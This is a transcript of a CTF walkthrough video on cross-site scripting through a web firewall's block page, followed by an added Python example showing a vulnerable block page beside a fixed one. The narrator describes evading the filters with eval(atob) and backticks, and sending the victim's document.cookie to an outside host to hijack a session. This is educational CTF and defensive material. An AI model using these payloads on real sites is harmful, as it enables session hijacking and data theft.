All-Army CyberStakes! Cross-Site Scripting Filter Evasion

Captions
Hello everybody, welcome back. In this YouTube video I'm showcasing All-Army CyberStakes, or ACI CTF, that was going on this past week. I've been wanting to showcase some of these cool challenges. There were a ton of fantastic ones; I'm trying to get a lot of the tougher ones, at least some of the more complex ones that I solved, out of the way now before I burn out trying to record all this stuff. This challenge is called "I've Caught You Now". It's worth 250 points. Currently it's Friday; the competition ends on Sunday, so there might be a few more solves, but at the time of recording there are only 43 solves for this challenge. It says: "XSS, or cross-site scripting, is a thing of the past. Read all about it here," and we're given a link, so I will open that up in a web browser.

It took a little bit to render that page, which was weird, but this is the Cyber Times web page. It says there are five cool ways to protect your websites from hackers. This looks kind of like a blog. Here are featured posts: "You will never believe this flag we found". It says when going headfirst into CTFs everyone wants to find, blah blah blah, flags. And "help us out, submit cool content to us". Okay, so if I were to click on one of these, I'll go to article zero. It says "to fight back these companies deploy applications called a web application..." and then ellipses; it says "you're out of free articles, please use an account with a Cyber Times subscription to read this article". So if I try to click on any of these links here, search for security or hacking or exploit, cybercrime, firewall, CTFs, it looks like they're all modifying this search URL here. The search is the location that it's trying to go to, with an argument or an HTTP variable that's passed in, search, and what we're actually looking for. Going back to the page though, this featured post here, article 1, as the link says: "you'll never believe this flag we found, we figured out one challenge, you won't believe the flag we got, find out below". Okay, so that must be maybe where a flag could be hidden, but we do not have access to read that page.

There is a "submit cool content to us" location: "send us links to cool content, we'll see if it is newsworthy like you". I suppose we could give them a URL. So based off of everything that we've learned, it looks like there are web pages, there are blogs on this site, there's a location that we could submit a URL to visit, and we aren't able to access some of the pages and some of the content on this website. Given the challenge description, I'm assuming this is going to be a cross-site scripting attack, where we need to be able to drive whoever validates, or whoever checks that submission page, to review and access some of these pages that we cannot access. So where could we control, or where do we have an input that we could modify and make it do something? Sounds like we could at least kind of offer some input into the search blog functionality. The page is moving slowly for me, so why is that? I'll pause and see if it comes back. Okay, no, it seems to be stable. But if I were to search for something like the letter A, or "please subscribe", it looks like it renders it out on the page, so maybe we could do some things to actually get some cross-site scripting in there, render some HTML. Okay, that h1 doesn't seem to load for me, so that kind of takes away some of the wind that we had, but what else could we do? h1 anything, that's so weird that it does that. We could search for like an image tag maybe: if we do an image source equals nothing... oh okay, it says "this page has been blocked by Secure Web", and this is still on the web page, this isn't our browser trying to tell us something. It says "Secure Web detected that the URL parameter search contains dangerous data, so this web request has been blocked for your protection". Ah okay, so that must have triggered with the image source thing. Is it just the image tag that makes it whine? Yeah, yeah. So slash image, slash IM, is that going to load for me? Okay, so IM works, it's just searching for IMG with an opening arrow, and it'll whine for me: "Secure Web detected URL parameter search contains dangerous data".

It's weird though, because it includes the URL parameter itself in its response. So if I did something strange with a URL parameter, does it have to be search that has the weirdness, or could I also include something in here like it, image source equals, maybe? Could I do that? Or I'll just use the image tag itself; that seems to break it. Okay, could I use that h1 tag that I just tried earlier, h1 hello, and code as part of the URL? Oh okay, oh, I ended code, seeing that allowed my bad h1; that's the end code, that seems to do it. So injection, which is kind of peculiar. Well, let's start to script this, let's start to hammer this in a way that we could work with it and kind of be able to monitor and see everything that's happening. What is the name of this challenge again? "I've Caught You Now". So make directory I have caught you now, let's hop over in there and let's start to script this with Python. I have all of the other tabs open from some previous videos I've been recording; I'm trying to get a lot of these out for you guys. So let's import requests, let's get this URL, let's say URL equals just the base URL, I don't need search in here. So let's do a requests.get(url), I'll say r equals that, I'll print out r.text, and now let's try and run that. Okay, so it all returns out for us. To make things a little bit easier to see and work with, I'm going to use Shift-Alt-2 to get a second tab or pane within Sublime Text, and when I run this I have Build View as a plugin set up; you could install Package Build View, Ctrl-Shift-P to access that. And I will go ahead and mark this page as HTML so it's a little bit easier to read for us. So let's try and trigger that bad page again. Let's say our parameters can equal a dictionary with something, our h1 anything that we just tried, really, set to image.

So this is funky, because the parameter name itself is where we can get our cross-site scripting injection in, but the value is what is being used to trigger that WAF, or that web application firewall. The web application firewall has actually made it insecure in itself, because it is vulnerable to cross-site scripting. So the value of this HTTP variable, this GET variable, that's what's going to trigger the page, but then using this parameter name itself we can inject that into the page. So we'll specify params equals parameters; we should just call that variable params so it makes more sense, I guess. So let's spit that out. It says okay, "this page has been blocked by Secure Web, Secure Web detected URL parameter", code h1 anything being properly rendered. We know that because there aren't any like &lt; or &gt;, there are no HTML escaped sequences in there. "Contains dangerous data, so this request has been blocked for your protection". Okay, so it looks like our XSS payload... let's make a variable for that. Our XSS payload could be, let's use a long string in Python, I wonder if that'll let us do some things, h1 anything, end h1, anything. And what I actually want to do is print out the URL of this page so I can interact with it more, or I can see in my browser how this actually loads. So I'll copy that in, slap it in, and okay, it looks like that renders it just fine. This is currently trapped inside of a code block, so let me try and end that code block, and then it tries to have another one, so it tries to close its original code block, so I guess I'll add a new one in there just so the page doesn't do weird things. Now let's try to do some of our image source equals nonsense. I can use double quotes because we're inside of these triple quotes in Python. So if I have that and I do a little onerror equals JavaScript alert one plus one, so we know that'll evaluate... that gets the forbidden. Okay, so it seems sensitive on this image tag. I didn't try just a straight script, so we could try that: script and end script, alert one plus two, doesn't matter. Also gets a forbidden. Okay, but our h1 went through; that's weird. What can we get through?

Hmm, let's go to PayloadsAllTheThings, let's go check out some of their options and ideas for cross-site scripting or XSS injection. Looks like they have a few options. So typically a classic cross-site scripting technique would grab a cookie, a document.cookie, from really the end user. Maybe we could get that to work eventually, but we can't seem to use these script tags. What else could we do? Can't use script, can't use script... oh, the internal, and maybe it's replacing it, no, that's weird. So image also has it whine. Does SVG onload let it work? SVG onload, can we try an SVG payload? Let's try one of those, spit that in. Page is taking a little bit of time to come back. Oh okay, there it goes: code SVG onload alert XSS. What did it do to my quotes? How come my single quotes aren't in there? Does this actually happen on the webpage? Oh no, it does not, it does not run that alert, but it does a weird thing getting an SVG in there. Okay, if I use the 1 + 2, does that actually trigger it? That does. Okay, so we have JavaScript somehow, some way, but we can't seem to use quotes; the single quote didn't work. Will a double quote work? No, that is also being scraped out. Okay, what are other options? What can we do to get a string, XSS or JavaScript string without quotes? I feel like that's just a shot in the dark, but "can you create a JavaScript string without single quotes or double quotes", blah blah blah. I've had to create strings without quotes for projects as well. We're delivered a suitable thing: so they use String and they use forward slashes to get a string. Does that work? Or we could do it just from the numbers. Let's try both of those. Let's use String, this guy here, "this contains no quotes", let's try that. Copy that guy in, "this contains no quotes". Oh, but it also removed our spaces, what the heck? So the string showed up but we don't have spaces. That's going to be annoying. We could get spaces in there if we were to use that fromCharCode syntax. Let's try him, paste that in as our little alert payload, run that, copy him, put that on that page. That also doesn't work. Why not? alert String... oh, it removes the periods, oh my gosh. How are we going to be able to do a document.location if we don't have periods, or the dots? We can't actually use... dang. Okay, well, we at least learned a little bit of something: we could use strings if we use these forward slashes. Does this cover anything else? No, that's all that's in that page. I want to remove double quotes from string... that doesn't work. Oh, they use that here in PayloadsAllTheThings: alert with backticks. Does that work? Can we use backticks as a string? Hmm, well maybe we could still pull... can we use those? How could we escape this whole syntax without using periods and spaces? alert, eval... eval might let us do some stuff.

Ooh, oh oh, and we could probably like base64 encode JavaScript. So I always forget this function: if you were to go to the console and you were to try and run like atob, what is atob and btoa? Those can get something into and out of base64. So please sub... okay, btoa is to get it into base64 and atob is to decode from base64. Yeah okay, so let's try to get another actual payload. So let's say stager can actually equal this, and let's get a real payload that can be another multi-line string, and let's do alert hello this is me, or whatever, it doesn't matter as long as we have something with spaces and quotes. We could eval the atob, that's the one that we just determined was right. btoa? Yeah, so atob is what we need. And then if we use the forward slashes, will that work? Will forward slashes work? Let's go ahead and base64 encode: import base64, our payload, b64encode that payload, and let's set the payload to equal that, so now it is base64 encoded. And let me... I think I'm in Python 2 again because the stupid Sublime Text... we'll just spit that in with the percent sign. Does that work? Ooh, the page took it, spit that in. No, unexpected token. That thing, do I have too many... oh no, because that... do I have too many parentheses? Unexpected token closing parentheses. Could I use the backticks that I saw as a technique? Ooh, that worked, okay. Oh, so that would essentially give us like everything that we need, because now we're not working out of the like original filter, so we could use spaces, we could use quotes, we could probably even use periods. So now we have unfiltered JavaScript and we could perform a real cross-site scripting attack. Okay, that is progress.

So what do we need to do? Well, let's try and get someone's cookie. Let's spin up a little server that could be accessible from the internet, so a public box, and let's just make a directory for XSS, random name, doesn't matter, python -m, specify Python 3, 8888. So that guy should exist. He does, great, I see my request. Let's spin him one more time and let's try and modify our script to go to document.location, http trondheim.org, 8888 as the port, and let's include a document.cookie. Does that work for us? Does he have a cookie? If I run this I'll see myself go. If I try and go to this location, let me try that, I'll spin this up, I'll close out of this debugger here, let's paste that in. Okay, so that carried me over: error response, file not found, whatever, it doesn't need a file, but it got all of the cookies that I had, so my PHP session is in there. If I were to go submit that... okay, stop, I don't need that anymore, bring me back to the original server please, yeah fine. Spin that one more time and let's go make sure you guys can see that without my face being in the way. Go ahead and submit that URL to the validator or whoever's going to check that. "Thanks, we'll check it out in a few minutes, please give us some time before trying again". Okay, let's see if we ever get a request from him. We do, we do, we get a session. Oh perfect, okay, and that must be the cookie.

So I'm going to use my EditThisCookie manager, let's search cookies for here, can I add a new one, can I add a new cookie please? Whatever, let's not do it in the browser, let's just use our Python sorcery, the magic that we know within Python. So now let's just call this like catch_cookie.py and let's save a different one to be like get_flag.py. So we know that the session value looks like this, because we just caught that with our JavaScript cross-site scripting cookie catcher. So what we could do is use requests, holy crap, to get this URL. Let's say my cookies equals session set to that, with a key and value pair, let's say cookies equals cookies, and let's just load the page, print it out, r.text. Holy cow, okay, it reads it just fine. So can I get to that article 1 page? That's the one that says it has a flag in it. So let's get URL plus article 1 and spit that guy out. Oh yeah, okay, awesome, awesome: "when going headfirst into CTFs everyone wants to come out with some cool flag, after a truckload of effort we were rewarded with the text AC..." so there's our flag. That's it, that's what we did, that's how we solve it. That's fantastic.

So that was kind of cool, I hope you guys really liked that challenge. The little catch cookie... you needed to do some clever cross-site scripting stuff. If you had tinkered around with this for more... I actually did, I spent a lot of time, I think I spent like a couple hours on this one. SVG I didn't end up using originally; I actually did a body onload, and I would use a new line to get my spaces in there, and I was even like changing the whole URL or the CSS in that page, I'd be like, I'll verify what can I actually read in, can I make the background red, how many characters can I use, and I would slowly figure out, okay, these are the filters that are beating me up and how I needed to get around them. So that eval base64 technique is really what I used to get out of the filter and be able to use strings, periods, double quotes and single quotes, whatever I really needed to, and I staged it all with Python and would just grab the URL so I could kind of go back and forth between troubleshooting how it looks on the page and, hey, if it's going to actually render that JavaScript in my browser. So that's that, that was that challenge, but boy, I hope that was cool. I hope you guys learned a little bit of some tricks in there for cross-site scripting.

You could also do a little XMLHttpRequest, or XHR, and that's even the solution that I had; I'll go find and show you my script. Huh, I don't know, I'm still talking about this like... I'm not going to show you. What is the name of this challenge, why do I forget every single time? "I've Caught You Now", that's what it is. Yeah, I actually used XHR to go ahead and grab the article and then send it to myself. How would you document.location after? But getting the cookie will work just as well, because you're going to act as that user, so you could see the style sheets that I was saying I did crazy stuff with. That's it. But some people might have run into the issue where you're getting a CORS error, or a cross-origin policy, or like you have to be remaining on the website itself, you can't request out to an external site with XHR. That's correct. So when we were doing a document.location, document.location will not have that CORS problem, but if you were to use XHR or a new XMLHttpRequest to reach out to your external server where you're going to grab the flag from, well then it's going to say hey, you're not allowed to leave the site, or cross-origin policy is just not letting it have that. So don't use... do use document.location, you've got to use document.location to go ahead and grab that cookie, or grab the text that you really want to end up seeing. So that's that. XMLHttpRequest is kind of cool, because you can do a lot of drive-by downloading and access any other page you want, but if you are catching something externally you have to use document.location, or if you're sending something externally you'd have to use that. In this case at least, that's what I've seen; I'm happy to hear if you guys got anything else. But that was that challenge.

Wow, wow, thank you guys so much for watching. I hope you guys enjoyed this video, I hope you learned something cool, some neat tricks with cross-site scripting; a lot of good resources out there between PayloadsAllTheThings and just some quick googling and researching, just trying to do clever tricks and techniques. So if you liked this video please do hit that like button; if you didn't like it, hit the dislike button twice so I know how much you hated it. Leave a comment, type some things in the box and hit the Enter key, YouTube algorithm stuff. Please don't hesitate to subscribe, hit that bell icon... I don't know why you would ever hit a bell, personally, what did they do to you? But hey, I hate doing... I'm so bad at outros. Just get off the video. See you on LinkedIn, Twitter, Facebook and Discord, Patreon, etcetera. [Music]
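An added example, not the video's script or the challenge's code, of the defect the walkthrough uncovers: the block page inspects the parameter value but reflects the parameter name unescaped, and a filter that strips quotes, spaces and periods is no substitute for output encoding. The blacklist, the templates, the query strings and the function names are assumptions reconstructed from the behaviour described above.

```python
"""Vulnerable vs. hardened block page, reconstructed as an illustration."""
import html
from urllib.parse import parse_qsl

# Assumed signature blacklist: the block page fires when a VALUE contains these.
DANGEROUS_MARKERS = ("<img", "<script", "onerror", "onload")


def waf_flags_value(value: str) -> bool:
    """True if a parameter value trips the (assumed) signature blacklist."""
    lowered = value.lower()
    return any(marker in lowered for marker in DANGEROUS_MARKERS)


def strip_blacklisted_chars(js: str) -> str:
    """Character-stripping filter as described in the video: drops quotes,
    spaces and periods, but leaves every other character (backticks included)
    untouched, so it does not neutralise a template-string payload."""
    return "".join(ch for ch in js if ch not in "\"' .")


def block_page_vulnerable(query_string: str) -> str:
    """Reflects the offending parameter NAME into the page unescaped.
    Only the value was inspected, so HTML in the name reaches the browser."""
    for name, value in parse_qsl(query_string, keep_blank_values=True):
        if waf_flags_value(value):
            return ("<p>This page has been blocked. The URL parameter "
                    f"<code>{name}</code> contains dangerous data.</p>")
    return "<p>ok</p>"


def block_page_hardened(query_string: str) -> str:
    """Same block page with contextual output encoding on the reflected name.
    The fix is encoding at the output point, not a longer blacklist."""
    for name, value in parse_qsl(query_string, keep_blank_values=True):
        if waf_flags_value(value):
            safe_name = html.escape(name, quote=True)
            return ("<p>This page has been blocked. The URL parameter "
                    f"<code>{safe_name}</code> contains dangerous data.</p>")
    return "<p>ok</p>"


if __name__ == "__main__":
    # Constructed query string mirroring the video's h1 test: an HTML tag as
    # the parameter name, a blacklisted marker as the value.
    qs = "%3Ch1%3Eanything%3C%2Fh1%3E=%3Cimg"
    print(block_page_vulnerable(qs))   # <h1> lands in the page verbatim
    print(block_page_hardened(qs))     # &lt;h1&gt; renders as text
    print(strip_blacklisted_chars("alert('a b.c')"))  # alert(abc)
```

Note that the value check reproduces the IM-versus-IMG observation from the video: "search=%3CIM" passes while "search=%3CIMG" is blocked, which is the signature matching, not a security boundary.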
Info
Channel: John Hammond
Views: 41,793
Id: HbzI3ubOos0
Length: 26min 3sec (1563 seconds)
Published: Mon May 18 2020